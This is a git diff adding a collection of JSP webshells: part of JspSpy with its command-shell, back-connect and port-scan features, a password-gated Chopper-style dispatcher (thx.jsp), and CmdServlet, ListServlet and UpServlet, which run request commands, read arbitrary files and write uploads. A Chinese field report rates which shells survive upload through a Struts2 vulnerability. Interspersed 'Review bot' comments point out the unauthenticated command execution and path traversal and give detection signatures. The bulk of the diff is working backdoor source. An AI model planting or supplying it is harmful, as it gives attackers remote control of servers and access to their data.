    • "); +} +out.println("

    System Environment >>


      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new 
VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/other/thx.jsp b/jsp/hackk8/JSP/other/thx.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/hackk8/JSP/other/thx.jsp 
@@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else 
if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/Struts2下shell兼容性报告_K8.txt b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt new file mode 100644 index 0000000..28a6646 --- /dev/null +++ b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt 
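Review bot: Every branch of the `Z` dispatcher acts on raw request parameters with no authentication: `M` builds the `Runtime.getRuntime().exec(c)` argument array from `z1` and `z2`, `C` and `D` read and write whatever path `z1` names, and the only gate is knowing the parameter name in `Pwd="xc"`. The file has no header saying what it is; a leading comment such as `<%-- sample: request-driven file/DB/command dispatcher; action in the Pwd parameter, arguments in z0/z1/z2 --%>` would document that for anyone triaging the tree. For detection, the fixed `->|` … `|<-` response framing, the `ERROR:// ` prefix and the `z0`/`z1`/`z2` parameter set are content signatures visible in this hunk. The bodies of the helpers `AA`–`QQ` are partly lost in this rendering and are not reviewed here.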
@@ -0,0 +1,54 @@
+
+struts2 环境下 jspshell 功能测试 2013.5.23 by 拉登哥哥
+看下这个报告 你们就知道 为啥s2上传的shell成功率低的原因了
+上传不成功或内容被过滤是另外的事 上传成功的shell没被过滤又不解析或报错 就是以下原因了
+
+struts 2.2.1.1 默认环境下 以下报告是在这版本下的 别的版本未知
+好像默认环境没带有IO操作 还有 org.apache.jasper(S2文件上传组件)
+自己找了无组件上传的jsp 也报废...
+
+
+K8收集的(其实之前也在网上问人要来的一些 wooyun某群群主 还有其它成员)
+
+k8cmd.jsp 兼容性非常好 不管在s2 还是普通环境下都正常使用
+实战 支持Win/Linux 还有执行的命令通过飞刀加密发送
+
+普通 cmd.jsp啥的 可以使用 不用说了 但是在linux下不行
+
+other下面的大马 丢到struts2环境下 没一个能正常解析的
+
+JspWebshell 1.2.jsp 能解析 但上传不了文件 好像是马写的有问题
+
+JavaShell.jsp jsp-reverse.jsp 也不能解析
+
+kbaidu8.jsp 兼容性8错 哥专用的 原版 jspspy 1.0 但是上传文件也是失败的 1.2版本的直接报废
+
+Customize.jsp 菜刀的jsp马 本地s2环境 报错 连接上也可以操作
+实战 通过struts2的洞 上传过去的 功能就废了(linux下) win的还未测试
+
+JSP无组件实现WEB上传.rar 也失效
+
+一句话jsp那个 可以传过去 但是无法写出文件
+
+
+77收集的几个 Win下测试
+
+browser.jsp 可以使用 但是文件上传功能报废 原因都是这个组件 org.apache.jasper
+
+还有是cmd相关的也可用 也只是win下的
+
+其它都是直接报废。。。。。
+
+法客工具包里的jsp
+no.jsp 其实是那个什么jsfoloer改的 也是上传文件功能不行 别的功能未测
+silic webshell.jsp 和no.jsp in.jsp都是jsfoloer改的
+
+JspSpyJDK5.jsp 报废
+
+ma2.jsp 能解析 但上传文件那失败 java.io.IOException: 这就是IO了
+ma3.jsp 直接报废 因为使用的是jasper
+ma1.jsp 和ma4.jsp job.jsp探针 能正常解析
+spjspshell.jsp 直接报废 同ma3.jsp 用的组件一样
+
+总结: 普通单纯执行cmd一类的都能正常运行,探针也是 个别大马也勉强 jspspy 1.0兼容性 比较靠普
+在这些样本里90%都挂了 实战中 也许有些站加了上传组件啥的 可能部分上传脚本还是能用的 具体自测
diff --git a/jsp/hackk8/jsp2/CmdServlet.class b/jsp/hackk8/jsp2/CmdServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..4afd7f10f720f1ff5916b02fdc2ec5fb1e0814fd GIT binary patch literal 1785 zcma)7-%}e^6#i}!vdglRvJfbxtsz<(C}G>GSYe6U6lfGFCb1RkuT63TTiG9OHVi!Y z7dYdCkG}ZQ8E1TIUxL^fAARtD@n2BS-6XJ#onmHk?(VtYx#yhke)sO5fB*J7fO&ka z;1%R#%nv}v4PkD|xTWBAydmRF84EJrl5tzc+XGm{k_1D+pa@tNV_wEPVtiM@d$=Q` zAjZ2ARursaO~DxM2~!m7y)WYf8S64Wl&~S;K10&594p8(#IrLG7!n1y&KZW*Er)Nk z>?-#wW_6c5eRX$@2Mnd``eSp?+}E4j-`nMZz7qtVeveGK<0$cOTD%!7oe67tuG8d8 zBCE2pU*le2kwe0!gpU}`ZS$bJV$o^145QhZa7lgFbhhX-qNn2Yg=?YVS%YsVJkO;$u)=)ez3SQFZGFc?l0ye1ZzYEn~;e8(!XM zxW1jXd9dTwmosZCl}y?(ZN8kb55!C+ZPrB1%b5)EcZG=bT0uHE@CYF?_RuxEE&!QR zfM%;|TLjrNcUy!nb0-8zhAx&C`$1t6wp4tIM+{@4ooMTKT8#$xi58_-Y&BnSZQFF} zi)j^~;d6#@#n7wN9W^8VVN*WOD=NOgtb{LBdzX+J6Qp>G9(_3@q< ziKb0bVt0b{cw9}yO{d2bAcm`FRTZ8c5+>!^G<_0Vm~Q$-CB5i0Bu&pFB{9tXuZWI_ zsA@TIJ12@^IHWT?WTlo9ST<3jP&vmhsb23<46Tvi`<&!+?TpNuzFXtXCIv(?b)B7K zAJN=trXv#+exaL)wjeqY-eROzB7v^7BGr{G%sjvpuFxebesM5yEs)L7+hrOVjeWC+ zV9)4*;Z?H9&^buF}5|4Xk+{k7Z&^C z3&{z}KC!isjQxbcTq^lP8yA26=dYYL8J2K~>`7az7^Vi!LxzSSj39+kOp=|V55zT$ zBZmpx#zj0L@3**w?}(r8iMbz%yC+1*OQa{slW~#M}S? literal 0 HcmV?d00001 diff --git a/jsp/hackk8/jsp2/CmdServlet.java b/jsp/hackk8/jsp2/CmdServlet.java new file mode 100644 index 0000000..f9cb31a --- /dev/null +++ b/jsp/hackk8/jsp2/CmdServlet.java @@ -0,0 +1,43 @@ +/* + * CmdServlet.java 20/01/2004 + * + * @author The Dark Raver + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.*; +import javax.servlet.http.*; + + +public class CmdServlet extends HttpServlet { + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + res.setContentType("text/html"); + + PrintWriter out = res.getWriter(); + out.print(""); + out.print("

    "); + out.print(""); + out.print(""); + out.print("
    "); + + if(req.getParameter("cmd") != null) { + out.print("\n

    Command: " + req.getParameter("cmd") + "\n


    \n");
    +	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
    +	        DataInputStream procIn = new DataInputStream(p.getInputStream());
    +			int c='\0';
    +        	while ((c=procIn.read()) != -1) {
    +				out.print((char)c);
    +				}
    +	        }
    +
    +		out.print("\n
    "); + out.print(""); + } + + public String getServletInfo() { + return "CmdServlet 0.1"; + } + +} diff --git a/jsp/hackk8/jsp2/ListServlet.class b/jsp/hackk8/jsp2/ListServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..b81617901454b92ea3e98197f49a2611ed045ec4 GIT binary patch literal 2377 zcmai0+fy4=82=q^d$MdVY@wK9+bxw6T0-oNwqXep?nnVcXr--}B^+SekkHKnrQU6; z*1OfJ*f(b^KIn|jI53s556(Ews1LsTjcLnhbKG)bJ|v2>Sk8DfFHv(~J2A(Ro$Y*M(PN!OhYbrTuNGGgNVjL5i6_f*SF zr&AfxB(16)7ZPIHwTYqNDFsh6Y@85o4zVXSo@OWy)OnDhq?MWo4Y`h;nrNb{L+KeO zAv$g8|GjB*VvSNm^0@V!V6r%&}BN0`>B@LHxh2fytInW12rNj7U5*fRfwfQ^F)^m$O;6-# zc+1<&F>I+b%vNK_ollD9S}*#rL9NwPYjnrNcyn!wtVT0KK`pgku^DQOkeCOIA^V~T z8yeomJ2KpB3>%Emc~@kNIvFly&hMorB$F<)Age*Ok+o!~%n!ULH9g}}uLx^O=HOio z@8P;E+WQ(lz%lZ%%}Uj}Mod^^hIB_7U?^MH0}Q2ky~VIYTKVrGSf`L{<+VO1%d39& z4CHb5{6B6?WT%F~NAq#gv0d3Im8+vcFnH7HSEkmy$C zq%7z7D!BJ_QkM}Vy`w!eFM%G(D^4WS8G&7Bq+bsCR|qDbB%)zDZKsvdTD*4|>`U4( zG!ZTFm>N+N%_xwn1(#6-jTC;Wzl8#Z{(XAkEfkTgD5w`Np(Lm)L|3`rL(w^jR^S_1 zhN_n?LGu?8(KirT!bZ|v!KM*^(K0rNi~WR9w!n_9Kp)Y!ETcS3QrcF?tssQWz=o_W72EpN+O4yzt?mAqHFh=aLH z_b;F_sBiZ!k>wpZad}YRxymyS@;l zKjNsu8RAS}2OR9gJPdlos&O5=aRW8DiCTPy0KO%hpRo_WAc$Y-KbGIIAAjHg_1Ga+ zio>iNN7yzTWi|BnHK2(dg2^tyU{}$?uA!BEgf{jG+S#Y*V4tIleT8oJ4SLykIL>~= oAR=CO7N7+WQFpc?N>ny-6|J(73-!Za(30QAaXPgTuK?|T1OIR|FaQ7m literal 0 HcmV?d00001 diff --git a/jsp/hackk8/jsp2/ListServlet.java b/jsp/hackk8/jsp2/ListServlet.java new file mode 100644 index 0000000..1d97304 --- /dev/null +++ b/jsp/hackk8/jsp2/ListServlet.java 
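Review bot: `doGet` concatenates `req.getParameter("cmd")` into `Runtime.getRuntime().exec("cmd /c " + …)` with no authentication or allow-list, and prints the same parameter back into the page unescaped, so the servlet is a remote command endpoint and a reflected-XSS sink at once; `ListServlet.java` and `UpServlet.java` later in this patch act on request input in the same unauthenticated way. The header comment gives only author and version and should state the behaviour, e.g. `* Sample: runs the "cmd" request parameter via cmd /c and streams stdout to the response.` Because the command travels in a GET query string it is recorded in access logs, and the container's JVM spawning `cmd` is the process-level event to alert on. The HTML inside the `out.print` literals is lost in this rendering, so the form markup is not reviewed.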
@@ -0,0 +1,86 @@
+/*
+ * ListServlet.java
+ *
+ * @author Sierra
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.ServletException;
+import javax.servlet.http.*;
+
+public class ListServlet extends HttpServlet
+{
+
+
+ public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+ PrintWriter printwriter = res.getWriter();
+ String path = req.getParameter("file");
+
+ printwriter.write("\n\nDirectory Listing\n\n\n");
+ printwriter.write("\n");
+ if(req.getParameter("file")==null) path = "c:\\";
+ printwriter.write("

    Path: " + path + "


    \n");
    +
    +		File file = new File(path);
    +
    +		if(file.isDirectory())
    +		{
    +			String s = new String("Unknown");
    +			String s2 = new String("Black");
    +			File afile[] = file.listFiles();
    +			for(int i = 0; i < afile.length; i++)
    +			{
    +				String s1 = new String(afile[i].toString());
    +				printwriter.write("(");
    +				String s3;
    +				if(afile[i].isDirectory())
    +				{
    +					printwriter.write("d");
    +					s1 = s1 + "/";
    +					s3 = new String("Blue");
    +				} else
    +				if(afile[i].isFile())
    +				{
    +					printwriter.write("-");
    +					s3 = new String("Green");
    +				} else
    +				{
    +					printwriter.write("?");
    +					s3 = new String("Red");
    +				}
    +				if(afile[i].canRead())
    +					printwriter.write("r");
    +				else
    +					printwriter.write("-");
    +				if(afile[i].canWrite())
    +					printwriter.write("w");
    +				else
    +					printwriter.write("-");
    +				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n"); + } + + printwriter.write("
    ");
+ } else
+ if(file.canRead())
+ {
+ FileInputStream fileinputstream = new FileInputStream(file);
+ int j = 0;
+ while(j >= 0)
+ {
+ j = fileinputstream.read();
+ printwriter.write(j);
+ }
+ fileinputstream.close();
+ } else
+ {
+ printwriter.write("Can't Read file
    "); + } + + } + + + public String getServletInfo() { + return "Directory Listing"; + } +} \ No newline at end of file diff --git a/jsp/hackk8/jsp2/UpServlet.class b/jsp/hackk8/jsp2/UpServlet.class new file mode 100644 index 0000000000000000000000000000000000000000..fef990ed2b0c25277e6b5ac5cec37a7e47872ea8 GIT binary patch literal 2072 zcma)7OH&(15dH=|b|oz!1OjA?EelKl0|Gx3TSy8v_(4p7@N!6;#EUe*lGUy(jWEuc zUyx%iRJkgZt8;-ORORlRa`efU+?@ZAq-Q0BFi9L8dR{%<-+uk|=+{4g{sq7Yp83&- z8!8e3e2AOU+)|PBV;m_JX%!h2AE}s7aa+M1KQ!D3U=mXb?)uS;dn)eB@qvPAKU!s= zkLCDKni*+6k#}Yl%&D07;~YL!u;52G7G;E7Ckt@tKNM1)nSUg29_IEJI`% zT>S$p4DLxg#~GSu42#c}^J~1gq_3H@|_Hn^yUp0?I)hPM6z zCwAP_t&RAiC>qwrIK^1B%f&3eXGpY7%g1m=Bw7t0pr64f_>KgeHx+!P;cGn6pks|e zOUcblYR%3)&nU=h$l(dYL~5;=Nv+$(d^FF+rkzX2=I0idVo^OSv8H3OD7UiWd4Z>6 z`LZdDf?gDH=|7y)g&reTN0;Yk=59|#iRD6BL@U1QgfSMi^gP|G%uB|%G*67mE4`2CqoODxCP9~Z)rQ#0ol=Eq{5tQFtPmcnwVI3O`9nO(q$EOJ3 zw8TUNay>5@+N3I{3PqmLU|@@({oOEk%IoXA$Uu7f2BtK0&%#v=HVVYzaqMahvdPDW zRT8>sj+pj_%s`xW);rCW#VG_&H59R>p(Kq!S;Mxhn>UqCN9P_gG}g)*9UU2?g4Wgy z7i8dnm*p9Us-|knV`x2wHa%Cj+xOpb7kEX-RE824leQ(eC6-7M4B<+v)EB~0yN?w8 zsAvdDWyi6YsU-8HewNq8tmA<9~S=-9$^u>Mu zD*=UWIe{*P=wJ>K<<;8EaBD-5)V*eP;&~=(K~G=*w0w&^S<^0YT*75~v*phXCZ7+o z1GMUc^*6VCGlD&cd5cixSZ-qz#&J%gv2;c&maFHmB5_vHyQ4hw@i"); + out.print("
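Review bot: `path` goes from `req.getParameter("file")` into `new File(path)` with no base directory or canonicalisation, so the servlet lists any directory and returns any file the container's account can read. If a listing servlet is wanted at all, canonicalise the requested path and reject anything outside a fixed base before any output is written, e.g. `if (!new File(path).getCanonicalFile().toPath().startsWith(BASE)) { res.sendError(HttpServletResponse.SC_FORBIDDEN); return; }`, where `BASE` is a canonical `Path` constant this file does not define yet. `path` and the entry names are also written into the HTML unescaped. Requests whose `file` parameter carries an absolute path are the log signature for this servlet.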
    ");
+ out.print("UPLOAD ");
+ out.print("");
+ out.print("
    ");
+ out.print("");
+ }
+
+
+ public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+ String tag = new String();
+ int c = '\0';
+ int contador = 0;
+ ServletInputStream in = req.getInputStream();
+ DataInputStream post = new DataInputStream(in);
+
+ PrintWriter out = res.getWriter();
+ res.setContentType("text/html");
+ out.print("
    ");
    +
    +		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
    +			tag=tag.concat("" + (char)c);
    +			contador++;
    +			}
    +
    +		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
    +
    +		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
    +		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
    +
    +		// (!) Uploaded File Name
    +
    +		File newfile = new File("c:\\install.log");
    +
    +		/////////////////////////
    +
    +		FileOutputStream fileout = new FileOutputStream(newfile);
    +
    +		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
    +			c=post.read();
    +			fileout.write((char)c);
    +			}
    +
    +		fileout.close();
    +		out.print("<== OK");
    +
    +    }
    +
    +
    +    public String getServletInfo() {
    +		return "UpServlet 0.1";
    +    }
    +
    +}
    \ No newline at end of file
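Review bot: `doPost` overwrites the fixed path in `new File("c:\\install.log")` with the request body and sizes its copy loop from `req.getContentLength() - tag.length() - contador - 11`, a client-supplied header, without checking `post.read()` for -1 or capping the total; a body shorter than declared is padded with 0xFF bytes. `fileout.close()` is not in a `finally`, so the stream stays open if a write throws. The `// (!) Uploaded File Name` marker is the only documentation; the class comment should state the behaviour, e.g. `* Sample: writes the multipart body of a POST to a fixed path, overwriting it.` The start of this hunk, including `doGet`, is fused with the preceding binary patch in this rendering and is not reviewed.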
    diff --git a/jsp/hackk8/jsp2/browser.jsp b/jsp/hackk8/jsp2/browser.jsp
    new file mode 100644
    index 0000000..7d85dc8
    --- /dev/null
    +++ b/jsp/hackk8/jsp2/browser.jsp
    @@ -0,0 +1,1802 @@
    +<%--
    +	jsp File browser 1.1a
    +	Copyright (C) 2003,2004, Boris von Loesch
    +	This program is free software; you can redistribute it and/or modify it under
    +	the terms of the GNU General Public License as published by the
    +	Free Software Foundation; either version 2 of the License, or (at your option)
    +	any later version.
    +	This program is distributed in the hope that it will be useful, but
    +	WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
    +	FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
    +	You should have received a copy of the GNU General Public License along with
    +	this program; if not, write to the
    +	Free Software Foundation, Inc.,
    +	59 Temple Place, Suite 330,
    +	Boston, MA 02111-1307 USA
    +	- Description: jsp File browser v1.1a -- This JSP program allows remote web-based
    +				file access and manipulation.  You can copy, create, move and delete files.
    +				Text files can be edited and groups of files and folders can be downloaded
    +				as a single zip file that's created on the fly.
    +	- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
    +--%>
    +<%@page import="java.util.*,
    +                java.net.*,
    +                java.text.*,
    +                java.util.zip.*,
    +                java.io.*"
    +%>
    +<%!
    +    //FEATURES
    +    private static final boolean NATIVE_COMMANDS = true;
    +
    +    //Allow browsing and file manipulation only in certain directories
    +	private static final boolean RESTRICT_BROWSING = false;
    +    //If true, the user is allowed to browse only in RESTRICT_PATH,
    +    //if false, the user is allowed to browse all directories besides RESTRICT_PATH
    +    private static final boolean RESTRICT_WHITELIST = false;
    +    //Paths, sperated by semicolon
    +    //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
    +	private static final String RESTRICT_PATH = "/etc;/var";
    +
    +    //The refresh time in seconds of the upload monitor window
    +	private static final int UPLOAD_MONITOR_REFRESH = 2;
    +	//The number of colums for the edit field
    +	private static final int EDITFIELD_COLS = 85;
    +	//The number of rows for the edit field
    +	private static final int EDITFIELD_ROWS = 30;
    +	//Open a new window to view a file
    +	private static final boolean USE_POPUP = true;
    +	/**
    +	 * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
    +	 * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
    +	 * This can yield to performance issues. Turn it of, if the directory loads to slow.
    +	 */
    +	private static final boolean USE_DIR_PREVIEW = true;
    +	private static final int DIR_PREVIEW_NUMBER = 10;
    +	/**
    +	 * The name of an optional CSS Stylesheet file
    +	 */
    +	private static final String CSS_NAME = "Browser.css";
    +	/**
    +	 * The compression level for zip file creation (0-9)
    +	 * 0 = No compression
    +	 * 1 = Standard compression (Very fast)
    +	 * ...
    +	 * 9 = Best compression (Very slow)
    +	 */
    +	private static final int COMPRESSION_LEVEL = 1;
    +	/**
    +	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
    +	 * server runs on a windows platform, to avoid a message box, if you try to access
    +	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
    +	 */
    +	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
    +
    +	/**
    +	 * Command of the shell interpreter and the parameter to run a programm
    +	 */
    +	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
    +	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix
    +
    +	/**
    +	 * Max time in ms a process is allowed to run, before it will be terminated
    +	 */
    +	private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
    +
    +	//Button names
    +	private static final String SAVE_AS_ZIP = "Download selected files as zip";
    +	private static final String RENAME_FILE = "Rename File";
    +	private static final String DELETE_FILES = "Delete selected files";
    +	private static final String CREATE_DIR = "Create Dir";
    +	private static final String CREATE_FILE = "Create File";
    +	private static final String MOVE_FILES = "Move Files";
    +	private static final String COPY_FILES = "Copy Files";
    +
    +	//Normally you should not change anything after this line
    +	//----------------------------------------------------------------------------------
    +	//Change this to locate the tempfile directory for upload (not longer needed)
    +	private static String tempdir = ".";
    +	private static String VERSION_NR = "1.1a";
    +	private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
    +
    +	public class UplInfo {
    +
    +		public long totalSize;
    +		public long currSize;
    +		public long starttime;
    +		public boolean aborted;
    +
    +		public UplInfo() {
    +			totalSize = 0l;
    +			currSize = 0l;
    +			starttime = System.currentTimeMillis();
    +			aborted = false;
    +		}
    +
    +		public UplInfo(int size) {
    +			totalSize = size;
    +			currSize = 0;
    +			starttime = System.currentTimeMillis();
    +			aborted = false;
    +		}
    +
    +		public String getUprate() {
    +			long time = System.currentTimeMillis() - starttime;
    +			if (time != 0) {
    +				long uprate = currSize * 1000 / time;
    +				return convertFileSize(uprate) + "/s";
    +			}
    +			else return "n/a";
    +		}
    +
    +		public int getPercent() {
    +			if (totalSize == 0) return 0;
    +			else return (int) (currSize * 100 / totalSize);
    +		}
    +
    +		public String getTimeElapsed() {
